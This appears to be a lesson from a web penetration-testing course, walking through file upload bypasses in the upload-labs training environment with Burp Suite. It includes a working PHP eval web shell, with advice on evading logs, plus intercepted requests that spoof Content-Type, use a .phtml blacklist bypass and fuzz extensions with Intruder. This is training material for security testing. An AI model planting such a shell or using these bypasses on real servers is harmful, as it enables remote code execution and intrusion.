Exploiting File Upload with Burp Suite

#Hands-On Exploitation with Burp Suite#link

Theory is essential, but file upload exploitation is fundamentally a hands-on skill. In this lesson, we will walk through a complete file upload attack using Burp Suite — the industry-standard tool for web application penetration testing. We will use the upload-labs environment that we set up in Lesson 1.

Lab Setup: upload-labs Pass-01 (Client-Side Validation)

Pass-01 in upload-labs implements only client-side JavaScript validation. The JavaScript checks the file extension and blocks anything that isn't .jpg, .png, or .gif. Let's bypass this step by step.

Step 1: Create a simple PHP web shell for testing:

<?php
    @eval($_POST['cmd']);
?>

Save this as shell.php. We use $_POST instead of $_GET to avoid the command appearing in server logs, and @ to suppress any PHP errors that might reveal our presence.

Step-by-Step Burp Suite Workflow

Step 2: Configure your browser to use Burp Suite as a proxy (typically 127.0.0.1:8080). Make sure Burp's Intercept is turned on.

Step 3: Navigate to the upload-labs Pass-01 page and select shell.php. Click Upload. The request will be caught by Burp's Intercept.

Step 4: In Burp's Intercept tab, examine the request. You will see something like this:

POST /upload-labs/Pass-01/index.php HTTP/1.1
Host: localhost:8080
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: application/octet-stream

<?php @eval($_POST['cmd']); ?>

------WebKitFormBoundary
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundary--

Step 5: Since this is Pass-01 with only client-side validation, we can simply forward the request as-is. The JavaScript validation already ran in the browser and was satisfied (or we disabled it). Click 'Forward' in Burp.

Step 6: The server responds with the upload path. Navigate to that path and append ?cmd=phpinfo() (or use a POST request with the cmd parameter) to verify code execution.

Lab: Pass-02 (Content-Type Verification Bypass)

Pass-02 validates the Content-Type header on the server side. It only allows image/jpeg, image/png, or image/gif. Here's how to bypass it:

Step 1: Select shell.php and upload it. Intercept the request in Burp.

Step 2: In the intercepted request, locate the Content-Type header within the multipart body part for the file. Change it from application/octet-stream to image/jpeg.

--- Before modification ---
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: application/octet-stream

--- After modification ---
Content-Disposition: form-data; name="upload_file"; filename="shell.php"
Content-Type: image/jpeg

Step 3: Forward the request. The server validates the Content-Type, sees image/jpeg, and accepts the upload. The file content is still PHP code.

Lab: Pass-03 (Blacklist Bypass with Alternative Extensions)

Pass-03 uses a blacklist to block .php, .asp, .aspx, .jsp, and other dangerous extensions. However, it doesn't block .phtml. Rename shell.php to shell.phtml and upload it.

Using Burp Reiterator for Systematic Testing

When testing multiple bypass techniques, Burp Repeater is invaluable. Right-click on an intercepted request and select 'Send to Repeater.' In Repeater, you can modify any part of the request and resend it repeatedly without re-intercepting.

Create a testing matrix in Repeater with different combinations:

Automating with Burp Intruder

Here's how to configure Burp Intruder for extension testing:

• ▪Send the upload request to Intruder (Ctrl+I)
• ▪In the Positions tab, clear all payload positions
• ▪Highlight only the file extension in the filename (e.g., the 'php' in 'shell.php')
• ▪Set the payload type to 'Simple list' and load a wordlist of extensions
• ▪Start the attack and analyze results